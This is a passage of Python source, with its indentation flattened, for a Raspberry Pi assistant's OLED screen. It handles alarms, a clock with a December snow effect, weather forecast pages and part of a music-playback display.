if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i + 1
elif setal == 'actspec':
i = 0
alarmcrons = [['All','all']]
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
alarmcrons.append(['(Disable) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['(Disable) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'select alarm')
if delalarm == 'all':
choic = Myassistant.select_list(self,[['Enable','en'],['Disable','di'],['Exit','exit']],'select statut')
if choic == 'en':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i + 1
elif choic == 'di':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i + 1
elif not delalarm == 'exit' and not delalarm == None:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[int(delalarm)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[int(delalarm)][3]:
self.act_cron[int(delalarm)][3] = 'Myassistant.alarm_dring(self)#cantdel'
else:
self.act_cron[int(delalarm)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = 0
alarim = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
alarim.append(self.act_cron[i])
i = i + 1
if str(alarim) == '[]':
alarim = 'None'
self.var_save["Alarm cron"] = alarim
Myassistant.save_var_in_file(self)
def main_heure(self):
if time.strftime("%S") == '00':
stime = [str(time.strftime("%A")),str(time.strftime("%H")),str(time.strftime("%M"))]
i = len(self.act_cron) - 1
while i > -1:
if self.act_cron[i][0] == '-' or self.act_cron[i][0] == stime[0]:
if self.act_cron[i][1] == '--' or self.act_cron[i][1] == stime[1]:
if self.act_cron[i][2] == '--' or self.act_cron[i][2] == stime[2]:
threading.Timer(0,Myassistant.exec_error,[self,self.act_cron[i][3]]).start()
i = i - 1
if self.affichage == 'heure' :
Myassistant.reload_aff_heure_st(self)
if time.strftime("%M") == '00' :
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
try:
fio.get_forecast(latitude=coutry[1],longitude=coutry[0])
except:
print('Failed to get forecast')
time.sleep(0.5)
if self.veil == settings.get("Time stand by")*2:
self.affichage = 'heure'
time.sleep(0.5)
disp.clear()
Myassistant.refrech_error()
Myassistant.reload_aff_heure_st(self)
self.veil = self.veil + 1
elif self.veil < settings.get("Time stand by")*2:
self.veil = self.veil + 1
threading.Timer(0.5, Myassistant.main_heure,[self]).start()
if GPIO.input(bsquare) == 0 and GPIO.input(bround) == 0 and GPIO.input(brigt) == 0 and GPIO.input(bleft) == 0:
self.affichage = 'shutdown'
self.veil = settings.get("Time stand by")*2+1
if settings.get("Sense hat"):
hat.clear()
disp.clear()
Myassistant.refrech_error()
thetime = 40
while thetime > 0:
time.sleep(0.1)
if GPIO.input(bround) == 1 or GPIO.input(bround) == 1 or GPIO.input(brigt) == 1 or GPIO.input(bleft) == 1:
disp.clear()
Myassistant.refrech_error()
os.system('sudo reboot')
thetime = thetime - 1
disp.clear()
Myassistant.refrech_error()
os.system('sudo halt')
elif (GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0) and (self.affichage == 'heure' or self.affichage == ''):
self.veil = 0
self.affichage = 'heure total'
disp.clear()
Myassistant.refrech_error()
time.sleep(0.3)
threading.Timer(0, Myassistant.aff_heure,[self]).start()
threading.Timer(0, Myassistant.butonshearch,[self]).start()
def aff_heure(self):
direc = 0
x = 4
self.affichage = 'heure total'
decemb = []
alblink = 0
day = time.strftime("%a")
mon = time.strftime("%b")
if time.strftime("%B") == "December" :
i = random.randint(64,320)
while i > 0:
decemb.append([random.randint(0,127),random.randint(0,63)])
i = i - 1
for done_i in decemb:
draw.point((done_i[0],done_i[1]),fill=255)
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
while self.affichage == 'heure total' :
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
heure = time.strftime("%H")
minute = time.strftime("%M")
chiffre1 = Image.open('~/google-assistant/src/images/clock/' + str(heure[0]) + '.jpg')
chiffre1 = chiffre1.resize((35,35))
chiffre1 = ImageOps.invert(chiffre1)
image.paste(chiffre1, (-4,0))
chiffre2 = Image.open('~/google-assistant/src/images/clock/' + str(heure[1]) + '.jpg')
chiffre2 = chiffre2.resize((35,35))
chiffre2 = ImageOps.invert(chiffre2)
image.paste(chiffre2, (27,0))
chiffre3 = Image.open('~/google-assistant/src/images/clock/' + str(minute[0]) + '.jpg')
chiffre3 = chiffre3.resize((35,35))
chiffre3 = ImageOps.invert(chiffre3)
image.paste(chiffre3, (66,0))
chiffre4 = Image.open('~/google-assistant/src/images/clock/' + str(minute[1]) + '.jpg')
chiffre4 = chiffre4.resize((35,35))
chiffre4 = ImageOps.invert(chiffre4)
image.paste(chiffre4, (97,0))
if int(time.strftime("%S")) % 2 == 0 :
draw.line((62,12,64,12), fill=255)
draw.line((62,14,64,14), fill=255)
draw.line((62,18,64,18), fill=255)
draw.line((62,20,64,20), fill=255)
draw.line((0,34,54,34), fill=255)
draw.line((0,36,54,36), fill=255)
draw.line((0,38,54,38), fill=255)
draw.line((0,40,54,40), fill=255)
draw.text((58,32), time.strftime("%S"), font=font, fill=225)
draw.line((72,34,128,34), fill=255)
draw.line((72,36,128,36), fill=255)
draw.line((72,38,128,38), fill=255)
draw.line((72,40,128,40), fill=255)
if time.strftime("%S") == '00' :
day = time.strftime("%a")
mon = time.strftime("%b")
if time.strftime("%B") == "December" :
mon = 'Dec'
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
draw.text(((128 - (len(day + time.strftime(" %d ") + mon + time.strftime(" %Y")) * 6)) / 2,42),day + time.strftime(" %d ") + mon + time.strftime(" %Y"), font=font, fill=225)
if settings.get("Messages"):
goder = True
try:
for actmess in settings.get("Messages configuration"):
if eval(actmess[0]):
goder = False
if len(actmess[1]) * 6 > 128 :
if direc == 0 :
if len(actmess[1]) * 6 + x > 128 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
draw.text((x,53),actmess[1], font=font, fill=225)
else:
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
draw.text(((128 - (len(actmess[1]) * 6)) / 2,53),actmess[1], font=font, fill=225)
except:
print('Failed print message')
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
resources = 'CPU:'+str(psutil.cpu_percent())+'% MEM:'+str(psutil.virtual_memory().percent)+'%'
draw.text(((128 - (len(resources) * 6)) / 2,53),resources, font=font, fill=225)
if goder:
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
resources = 'CPU:'+str(psutil.cpu_percent())+'% MEM:'+str(psutil.virtual_memory().percent)+'%'
draw.text(((128 - (len(resources) * 6)) / 2,53),resources, font=font, fill=225)
else:
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
resources = 'CPU:'+str(psutil.cpu_percent())+'% MEM:'+str(psutil.virtual_memory().percent)+'%'
draw.text(((128 - (len(resources) * 6)) / 2,53),resources, font=font, fill=225)
if self.al:
if alblink < 3:
alarm = Image.open('~/google-assistant/src/images/clock/alarme.jpg')
alarm = alarm.resize((10,9))
alarm = ImageOps.invert(alarm)
image.paste(alarm, (59,0))
alblink = alblink + 1
else:
if alblink > 4:
alblink = 0
else:
alblink = alblink + 1
elif alfortom:
alarm = Image.open('~/google-assistant/src/images/clock/alarme.jpg')
alarm = alarm.resize((10,9))
alarm = ImageOps.invert(alarm)
image.paste(alarm, (59,0))
if mon == 'Dec':
if not len(decemb) == 0:
i = len(decemb)-1
while i > -1:
if decemb[i][1]+1 > 63:
del decemb[i]
else:
if decemb[i][0] % 2 == 0:
decemb[i] = [decemb[i][0]+1,decemb[i][1]+1]
else:
decemb[i] = [decemb[i][0]-1,decemb[i][1]+1]
i = i - 1
i = random.randint(0,5)
while i > 0:
decemb.append([random.randint(0,127),0])
i = i - 1
else:
decemb = []
i = random.randint(64,320)
while i > 0:
decemb.append([random.randint(0,127),random.randint(0,63)])
i = i - 1
for done_i in decemb:
draw.point((done_i[0],done_i[1]),fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and self.affichage == 'heure total':
if not len(self.buton) == 0:
self.veil = 0
if self.al == True:
del self.buton[0]
self.al = False
os.system('sudo killall mpg123')
elif self.buton[0] == 0 or self.buton[0] == 1:
del self.buton[0]
if settings.get("Alarm"):
Myassistant.alarm_action(self)
disp.clear()
Myassistant.refrech_error()
time.sleep(0.3)
while not len(self.buton) == 0:
del self.buton[0]
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
elif self.buton[0] == 2:
del self.buton[0]
Myassistant.execute_next(self,'right')
elif self.buton[0] == 3:
del self.buton[0]
Myassistant.execute_next(self,'left')
self.veil = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
buton = buton - 1
def aff_meteo(self):
self.affichage = 'météo'
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
try:
fio.get_forecast(latitude=coutry[1],longitude=coutry[0])
except:
print('Failed to get forecast')
afmete = 'currently'
direc = 0
x = 4
if fio.has_currently() is True:
currently = FIOCurrently.FIOCurrently(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if fio.has_daily() is True:
daily = FIODaily.FIODaily(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if daily.days() > 0:
daysel = 1
else:
daysel = 0
while self.affichage == 'météo':
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
buton = 20000
if time.strftime("%S") == '00' :
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
try:
fio.get_forecast(latitude=coutry[1],longitude=coutry[0])
except:
print('Failed to get forecast')
if fio.has_currently() is True:
currently = FIOCurrently.FIOCurrently(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if fio.has_daily() is True:
daily = FIODaily.FIODaily(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if afmete == 'currently':
if currently.icon == 'cloudy':
icon = Image.open('~/google-assistant/src/images/weather/cloud.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'hail' or currently.icon == 'sleet':
icon = Image.open('~/google-assistant/src/images/weather/hail.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'fog':
icon = Image.open('~/google-assistant/src/images/weather/haze.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'clear-night':
icon = Image.open('~/google-assistant/src/images/weather/moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'partly-cloudy-night':
icon = Image.open('~/google-assistant/src/images/weather/partly-moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'partly-cloudy-day':
icon = Image.open('~/google-assistant/src/images/weather/partly-sunny.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'rain':
icon = Image.open('~/google-assistant/src/images/weather/rain.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'snow':
icon = Image.open('~/google-assistant/src/images/weather/snow.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'thunderstorm':
icon = Image.open('~/google-assistant/src/images/weather/storm.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'clear-day':
icon = Image.open('~/google-assistant/src/images/weather/sun.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'tornado':
icon = Image.open('~/google-assistant/src/images/weather/tornado.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'wind':
icon = Image.open('~/google-assistant/src/images/weather/wind.jpg')
icon = icon.resize((34,35))
icon = ImageOps.invert(icon)
image.paste(icon,(0,12))
draw.line((2,26,11,26), fill=255)
temp = Image.open('~/google-assistant/src/images/weather/temperature.jpg')
temp = temp.resize((18,15))
temp = ImageOps.invert(temp)
temp = temp.crop(temp.getbbox())
image.paste(temp,(38,14))
draw.rectangle((39, 25, 42, 27), outline=255, fill=255)
humidity = Image.open('~/google-assistant/src/images/weather/humidity.jpg')
humidity = humidity.resize((14,14))
humidity = ImageOps.invert(humidity)
humidity = humidity.crop(humidity.getbbox())
image.paste(humidity,(37,33))
wind = Image.new('1', (11,11))
ImageDraw.Draw(wind).polygon([(5,0),(0,5),(4,5),(4,10),(6,10),(6,5),(10,5)],fill=255,outline=255)
try:
wind = wind.rotate(angle=round(currently.windBearing),expand=True,fillcolor=0)
except AttributeError:
pass
image.paste(wind,(round(78.5-(wind.size[0]/2)),round(21.5-(wind.size[1]/2))))
precip = Image.open('~/google-assistant/src/images/weather/pluviometer.jpg')
precip = precip.resize((15,15))
precip = ImageOps.invert(precip)
image.paste(precip,(71,32))
draw.line((78,45,78,46), fill=0)
draw.line((73,32,83,32), fill=0)
draw.text((47,16),str(round(currently.temperature))+'°C', font=font, fill=225)
draw.text((47,34),str(round(currently.humidity*100))+'%', font=font, fill=225)
if currently.windSpeed < 10:
if '.0' in str(round(currently.windSpeed,1)):
draw.text((87,16),str(round(currently.windSpeed,1)).replace('.0','')+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(currently.windSpeed,1))+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(currently.windSpeed))+'km/h', font=font, fill=225)
if currently.precipIntensity < 10:
if '.0' in str(round(currently.precipIntensity,1)):
draw.text((87,34),str(round(currently.precipIntensity,1)).replace('.0','')+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(currently.precipIntensity,1))+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(currently.precipIntensity))+'mm/h', font=font, fill=225)
if int(time.strftime("%S")) % 2 == 0 :
time_day = time.strftime('%a %d %b %Y %H:%M')
else:
time_day = time.strftime('%a %d %b %Y %H %M')
draw.text(((128 - (len(time_day) * 6)) / 2,0),time_day, font=font, fill=225)
if len(currently.summary) * 6 > 128 :
if direc == 0 :
if len(currently.summary) * 6 + x > 128 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
draw.text((x,50),currently.summary, font=font, fill=225)
else:
draw.text(((128 - (len(currently.summary) * 6)) / 2,50),currently.summary, font=font, fill=225)
elif afmete == 'dailys':
for day in range(0, daily.days()):
if day > -1 and day < 6:
fday = daily.get_day(day)
if fday['icon'] == 'cloudy':
icon = Image.open('~/google-assistant/src/images/weather/cloud.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'hail' or fday['icon'] == 'sleet':
icon = Image.open('~/google-assistant/src/images/weather/hail.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'fog':
icon = Image.open('~/google-assistant/src/images/weather/haze.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'clear-night':
icon = Image.open('~/google-assistant/src/images/weather/moon.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'partly-cloudy-night':
icon = Image.open('~/google-assistant/src/images/weather/partly-moon.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'partly-cloudy-day':
icon = Image.open('~/google-assistant/src/images/weather/partly-sunny.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'rain':
icon = Image.open('~/google-assistant/src/images/weather/rain.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'snow':
icon = Image.open('~/google-assistant/src/images/weather/snow.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'thunderstorm':
icon = Image.open('~/google-assistant/src/images/weather/storm.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'clear-day':
icon = Image.open('~/google-assistant/src/images/weather/sun.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'tornado':
icon = Image.open('~/google-assistant/src/images/weather/tornado.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'wind':
icon = Image.open('~/google-assistant/src/images/weather/wind.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
ImageDraw.Draw(icon).rectangle((0, 7, 21, 7), outline=0, fill=0)
if day == 0:
if daysel == 0:
draw.rectangle((6, 0, 36, 20), outline=255, fill=0)
image.paste(icon,(8,2))
time_day = 'Ytd'
draw.text((22 - ((len(time_day) * 6) / 2),20),time_day, font=font, fill=225)
elif day == 1:
if daysel == 1:
draw.rectangle((48, 0, 78, 20), outline=255, fill=0)
image.paste(icon,(50,2))
time_day = 'Tdy'
draw.text((64 - ((len(time_day) * 6) / 2),20),time_day, font=font, fill=225)
elif day == 2:
if daysel == 2:
draw.rectangle((90, 0, 120, 20), outline=255, fill=0)
image.paste(icon,(92,2))
time_day = 'Tmw'
draw.text((106 - ((len(time_day) * 6) / 2),20),time_day, font=font, fill=225)
elif day == 3:
if daysel == 3:
draw.rectangle((6, 32, 36, 52), outline=255, fill=0)
image.paste(icon,(8,34))
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a')
draw.text((22 - ((len(time_day) * 6) / 2),52),time_day, font=font, fill=225)
elif day == 4:
if daysel == 4:
draw.rectangle((48, 32, 78, 52), outline=255, fill=0)
image.paste(icon,(50,34))
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a')
draw.text((64 - ((len(time_day) * 6) / 2),52),time_day, font=font, fill=225)
elif day == 5:
if daysel == 5:
draw.rectangle((90, 32, 120, 52), outline=255, fill=0)
image.paste(icon,(92,34))
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a')
draw.text((106 - ((len(time_day) * 6) / 2),52),time_day, font=font, fill=225)
elif afmete == 'daily':
day = daysel
fday = daily.get_day(day)
if fday['icon'] == 'cloudy':
icon = Image.open('~/google-assistant/src/images/weather/cloud.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'hail' or fday['icon'] == 'sleet':
icon = Image.open('~/google-assistant/src/images/weather/hail.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'fog':
icon = Image.open('~/google-assistant/src/images/weather/haze.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'clear-night':
icon = Image.open('~/google-assistant/src/images/weather/moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'partly-cloudy-night':
icon = Image.open('~/google-assistant/src/images/weather/partly-moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'partly-cloudy-day':
icon = Image.open('~/google-assistant/src/images/weather/partly-sunny.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'rain':
icon = Image.open('~/google-assistant/src/images/weather/rain.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'snow':
icon = Image.open('~/google-assistant/src/images/weather/snow.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'thunderstorm':
icon = Image.open('~/google-assistant/src/images/weather/storm.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'clear-day':
icon = Image.open('~/google-assistant/src/images/weather/sun.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'tornado':
icon = Image.open('~/google-assistant/src/images/weather/tornado.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'wind':
icon = Image.open('~/google-assistant/src/images/weather/wind.jpg')
icon = icon.resize((34,35))
icon = ImageOps.invert(icon)
image.paste(icon,(0,12))
draw.line((2,26,11,26), fill=255)
tmin = Image.open('~/google-assistant/src/images/weather/tmin.jpg')
tmin = tmin.resize((18,15))
tmin = ImageOps.invert(tmin)
tmin = tmin.crop(tmin.getbbox())
image.paste(tmin,(38,14))
draw.rectangle((39, 25, 42, 27), outline=255, fill=255)
tmax = Image.open('~/google-assistant/src/images/weather/tmax.jpg')
tmax = tmax.resize((18,15))
tmax = ImageOps.invert(tmax)
tmax = tmax.crop(tmax.getbbox())
image.paste(tmax,(38,32))
draw.rectangle((39, 43, 42, 45), outline=255, fill=255)
wind = Image.new('1', (11,11))
ImageDraw.Draw(wind).polygon([(5,0),(0,5),(4,5),(4,10),(6,10),(6,5),(10,5)],fill=255,outline=255)
try:
wind = wind.rotate(angle=round(fday['windBearing']),expand=True,fillcolor=0)
except AttributeError:
pass
image.paste(wind,(round(78.5-(wind.size[0]/2)),round(21.5-(wind.size[1]/2))))
precip = Image.open('~/google-assistant/src/images/weather/pluviometer.jpg')
precip = precip.resize((15,15))
precip = ImageOps.invert(precip)
image.paste(precip,(71,32))
draw.line((78,45,78,46), fill=0)
draw.line((73,32,83,32), fill=0)
draw.text((47,16),str(round(fday['temperatureMin']))+'°C', font=font, fill=225)
draw.text((47,34),str(round(fday['temperatureMax']))+'°C', font=font, fill=225)
if fday['windSpeed'] < 10:
if '.0' in str(round(fday['windSpeed'],1)):
draw.text((87,16),str(round(fday['windSpeed'],1)).replace('.0','')+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(fday['windSpeed'],1))+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(fday['windSpeed']))+'km/h', font=font, fill=225)
if fday['precipIntensity'] < 10:
if '.0' in str(round(fday['precipIntensity'],1)):
draw.text((87,34),str(round(fday['precipIntensity'],1)).replace('.0','')+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(fday['precipIntensity'],1))+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(fday['precipIntensity']))+'mm/h', font=font, fill=225)
if day == 0:
time_day = 'Yesterday'
elif day == 1:
time_day = 'Today'
elif day == 2:
time_day = 'Tomorrow'
else:
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a %d %b %Y')
draw.text(((128 - (len(time_day) * 6)) / 2,0),time_day, font=font, fill=225)
if len(fday['summary']) * 6 > 128 :
if direc == 0 :
if len(fday['summary']) * 6 + x > 128 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
draw.text((x,50),fday['summary'], font=font, fill=225)
else:
draw.text(((128 - (len(fday['summary']) * 6)) / 2,50),fday['summary'], font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
while self.affichage == 'météo' and buton > 0:
if not len(self.buton) == 0:
direc = 0
x = 4
self.veil = 0
if self.buton[0] == 0:
del self.buton[0]
if afmete == 'currently':
afmete = 'dailys'
elif afmete == 'dailys':
afmete = 'currently'
elif afmete == 'daily':
afmete = 'currently'
elif self.buton[0] == 1:
del self.buton[0]
if afmete == 'currently':
afmete = 'dailys'
elif afmete == 'dailys':
afmete = 'daily'
elif afmete == 'daily':
afmete = 'dailys'
elif self.buton[0] == 2:
del self.buton[0]
if afmete == 'currently':
Myassistant.execute_next(self,'right')
elif afmete == 'dailys':
daysel = daysel+1
if daysel+1 > daily.days() or daysel > 5:
daysel = 0
elif afmete == 'daily':
daysel = daysel+1
if daysel+1 > daily.days() or daysel > 5:
daysel = 0
elif self.buton[0] == 3:
del self.buton[0]
if afmete == 'currently':
Myassistant.execute_next(self,'left')
elif afmete == 'dailys':
daysel = daysel-1
if daysel < 0:
if daily.days()+1 > 6:
daysel = 5
else:
daysel = daily.days()
elif afmete == 'daily':
daysel = daysel-1
if daysel < 0:
if daily.days()+1 > 6:
daysel = 5
else:
daysel = daily.days()
self.veil = 0
if not len(self.buton) == 0:
buton = 20000
else:
buton = 0
buton = buton - 1
def aff_music(self):
self.affichage = 'music'
mop = 0
mux = random.randint(0,128)
while self.affichage == 'music':
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.rectangle((0, 0, 127, 34), outline=255, fill=0)
draw.rectangle((0, 37, 127, 63), outline=255, fill=0)
if mop == 1:
draw.polygon([(90,8), (95,8), (105,2),(105,20),(95,14),(90,14)], outline=255, fill=255)
else :
draw.polygon([(90,8), (95,8), (105,2),(105,20),(95,14),(90,14)], outline=255, fill=0)
if mop == 2:
draw.rectangle((107, 2, 125, 20), outline=255, fill=255)
draw.text((111,5),'Zz' , font=font, fill=0)
else :
draw.rectangle((107, 2, 125, 20), outline=255, fill=0)
draw.text((111,5),'Zz' , font=font, fill=255)
t = 14
lx = 2
ly = 20
if not vlc.is_pause():
mux = mux - 4
if mux < 0-(len(vlc.get_title())*6) :
mux = 128
draw.text((mux,22),vlc.get_title() , font=font, fill=225)
if mop == 4:
draw.rectangle((41, 40, 46, 60), outline=255, fill=255)
draw.rectangle((51, 40, 56, 60), outline=255, fill=255)
else:
draw.rectangle((41, 40, 46, 60), outline=255, fill=0)
draw.rectangle((51, 40, 56, 60), outline=255, fill=0)
while t > 0 :
s = random.randint(1,10)
ly = 20
while s > 0 :
draw.rectangle((lx,ly,lx + 4,ly), outline=255, fill=255)
ly = ly - 2
s = s - 1
lx = lx + 6
t = t - 1
else :
if vlc.is_vlc_playing():
mux = mux - 4
if mux < 0-(len(vlc.get_title())*6) :
mux = 128
draw.text((mux,22),vlc.get_title() , font=font, fill=225)
